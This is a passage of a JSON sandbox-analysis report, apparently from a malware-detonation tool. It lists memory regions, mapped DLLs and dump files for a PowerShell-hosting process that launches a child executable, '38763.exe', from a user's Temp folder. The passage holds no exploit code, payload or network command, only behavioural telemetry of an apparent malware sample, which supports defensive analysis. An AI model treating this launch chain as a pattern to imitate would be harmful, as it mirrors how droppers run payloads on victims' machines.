"\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\82d7758f278f47dc4191abab1cb11ce3\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_661", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\82d7758f278f47dc4191abab1cb11ce3\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 1559756800, "timestamp": "00:00:37.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1614020608, "type": "region", "version": 1 }, "end_va": 1614053375, "entry_point": 1614020608, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll", "id": "region_662", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 1614020608, "timestamp": "00:00:37.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1802829824, "type": "region", "version": 1 }, "end_va": 1803014143, "entry_point": 1802829824, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\6c5bef3ab74c06a641444eff648c0dde\\Microsoft.PowerShell.Security.ni.dll", "id": "region_663", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\6c5bef3ab74c06a641444eff648c0dde\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 1802829824, "timestamp": "00:00:37.815", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000664-addr_0x0000000001d50000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_91", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30736384, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_664", "name": "private_0x0000000001d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 30736384, "timestamp": "00:00:39.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 65536000, "type": "region", "version": 1 }, "end_va": 65880063, "entry_point": 65536000, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll", "id": "region_665", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 65536000, "timestamp": "00:00:39.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1130496, "start_va": 1551106048, "type": "region", "version": 1 }, "end_va": 1552236543, "entry_point": 1551106048, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll", "id": "region_666", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 1551106048, "timestamp": "00:00:39.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1064960, "start_va": 1552285696, "type": "region", "version": 1 }, "end_va": 1553350655, "entry_point": 1552285696, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll", "id": "region_667", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1552285696, "timestamp": "00:00:39.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5464064, "start_va": 1553399808, "type": "region", "version": 1 }, "end_va": 1558863871, "entry_point": 1553399808, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll", "id": "region_668", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 1553399808, "timestamp": "00:00:39.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1917190144, "type": "region", "version": 1 }, "end_va": 1917210623, "entry_point": 1917190144, "filename": "\\Windows\\System32\\shfolder.dll", "id": "region_669", "name": "shfolder.dll", "norm_filename": "c:\\windows\\system32\\shfolder.dll", "region_type": "memory_mapped_file", "start_va": 1917190144, "timestamp": "00:00:39.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 69632, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 30871551, "entry_point": 0, "filename": null, "id": "region_670", "name": "pagefile_0x0000000001d60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30801920, "timestamp": "00:00:40.434", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000671-addr_0x0000000001e60000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_92", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 31850496, "type": "region", "version": 1 }, "end_va": 31916031, "entry_point": 0, "filename": null, "id": "region_671", "name": "private_0x0000000001e60000", "norm_filename": null, "region_type": "private_memory", "start_va": 31850496, "timestamp": "00:00:40.434", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000672-addr_0x0000000003ee0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_93", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 65929216, "type": "region", "version": 1 }, "end_va": 65994751, "entry_point": 0, "filename": null, "id": "region_672", "name": "private_0x0000000003ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 65929216, "timestamp": "00:00:40.435", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000673-addr_0x00000000042e0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_94", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70123520, "type": "region", "version": 1 }, "end_va": 70189055, "entry_point": 0, "filename": null, "id": "region_673", "name": "private_0x00000000042e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 70123520, "timestamp": "00:00:40.435", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000674-addr_0x00000000042f0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_95", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70189056, "type": "region", "version": 1 }, "end_va": 70254591, "entry_point": 0, "filename": null, "id": "region_674", "name": "private_0x00000000042f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 70189056, "timestamp": "00:00:40.435", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000675-addr_0x0000000004300000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_96", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70254592, "type": "region", "version": 1 }, "end_va": 70320127, "entry_point": 0, "filename": null, "id": "region_675", "name": "private_0x0000000004300000", "norm_filename": null, "region_type": "private_memory", "start_va": 70254592, "timestamp": "00:00:40.435", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000676-addr_0x0000000004310000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_97", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70320128, "type": "region", "version": 1 }, "end_va": 70385663, "entry_point": 0, "filename": null, "id": "region_676", "name": "private_0x0000000004310000", "norm_filename": null, "region_type": "private_memory", "start_va": 70320128, "timestamp": "00:00:40.436", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000677-addr_0x0000000004320000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_98", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70385664, "type": "region", "version": 1 }, "end_va": 70451199, "entry_point": 0, "filename": null, "id": "region_677", "name": "private_0x0000000004320000", "norm_filename": null, "region_type": "private_memory", "start_va": 70385664, "timestamp": "00:00:40.436", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\ATVEYD~1\\AppData\\Local\\Temp\\38763.exe\" ", "filename": "c:\\users\\atveyd~1\\appdata\\local\\temp\\38763.exe", "id": "proc_3", "image_name": "38763.exe", "monitor_reason": "child_process", "monitored_id": 3, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000003-region_00000750-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_130", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_750", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:54.480", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000751-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_131", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_751", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:54.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_752", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:54.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4284415, "entry_point": 4194304, "filename": "\\Users\\ATVEYD~1\\AppData\\Local\\Temp\\38763.exe", "id": "region_753", "name": "38763.exe", "norm_filename": "c:\\users\\atveyd~1\\appdata\\local\\temp\\38763.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:00:54.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 2002518016, "type": "region", "version": 1 }, "end_va": 2003812351, "entry_point": 2002518016, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_754", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2002518016, "timestamp": "00:00:54.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2004881407, "entry_point": 2004877312, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_755", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:00:54.482", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_756", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:54.485", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000757-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_132", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_757", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:54.485", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000758-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_133", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_758", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:54.485", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_759", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:54.499", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000760-addr_0x0000000000020000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_134", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_760", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:54.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1732607, "entry_point": 1310720, "filename": "\\Windows\\System32\\locale.nls", "id": "region_761", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:00:54.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2588671, "entry_point": 0, "filename": null, "id": "region_762", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:00:54.499", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000763-addr_0x0000000000290000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_135", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_763", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:00:54.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1832910848, "type": "region", "version": 1 }, "end_va": 1833242623, "entry_point": 1833080972, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_764", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1832910848, "timestamp": "00:00:54.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1972477951, "entry_point": 1972207072, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_765", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:00:54.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1973878784, "type": "region", "version": 1 }, "end_va": 1974521855, "entry_point": 1974091735, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_766", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1973878784, "timestamp": "00:00:54.501", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1974534144, "type": "region", "version": 1 }, "end_va": 1974575103, "entry_point": 1974539116, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_767", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1974534144, "timestamp": "00:00:54.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1974861824, "type": "region", "version": 1 }, "end_va": 1975521279, "entry_point": 1975067699, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_768", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1974861824, "timestamp": "00:00:54.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1975582720, "type": "region", "version": 1 }, "end_va": 1976406015, "entry_point": 1975703313, "filename": "\\Windows\\System32\\user32.dll", "id": "region_769", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1975582720, "timestamp": "00:00:54.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1983184896, "type": "region", "version": 1 }, "end_va": 1984053247, "entry_point": 1983495652, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_770", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1983184896, "timestamp": "00:00:54.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 2000355328, "type": "region", "version": 1 }, "end_va": 2001059839, "entry_point": 2000397426, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_771", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 2000355328, "timestamp": "00:00:54.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 2001076224, "type": "region", "version": 1 }, "end_va": 2002501631, "entry_point": 2001386045, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_772", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 2001076224, "timestamp": "00:00:54.505", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 2003894272, "type": "region", "version": 1 }, "end_va": 2004213759, "entry_point": 2003934217, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_773", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2003894272, "timestamp": "00:00:54.505", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 2004221952, "type": "region", "version": 1 }, "end_va": 2004807679, "entry_point": 2004238257, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_774", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 2004221952, "timestamp": "00:00:54.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_775", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:54.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1997926399, "entry_point": 1997804373, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_776", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:00:54.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1999503360, "type": "region", "version": 1 }, "end_va": 2000338943, "entry_point": 1999509131, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_777", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1999503360, "timestamp": "00:00:54.510", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000778-addr_0x0000000000280000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_136", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2625535, "entry_point": 0, "filename": null, "id": "region_778", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:00:54.554", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000779-addr_0x0000000000390000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_137", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3739647, "entry_point": 0, "filename": null, "id": "region_779", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:00:54.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5378047, "entry_point": 0, "filename": null, "id": "region_780", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:00:54.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 18022399, "entry_point": 0, "filename": null, "id": "region_781", "name": "pagefile_0x0000000000530000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5439488, "timestamp": "00:00:54.555", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000782-addr_0x00000000011c0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_138", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 18612224, "type": "region", "version": 1 }, "end_va": 18677759, "entry_point": 0, "filename": null, "id": "region_782", "name": "private_0x00000000011c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18612224, "timestamp": "00:00:54.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1983053824, "type": "region", "version": 1 }, "end_va": 1983156223, "entry_point": 1983072629, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_783", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1983053824, "timestamp": "00:00:54.556", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000784-addr_0x00000000011d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_139", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 18677760, "type": "region", "version": 1 }, "end_va": 19726335, "entry_point": 0, "filename": null, "id": "region_784", "name": "private_0x00000000011d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18677760, "timestamp": "00:00:54.592", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000785-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_140", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_785", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, 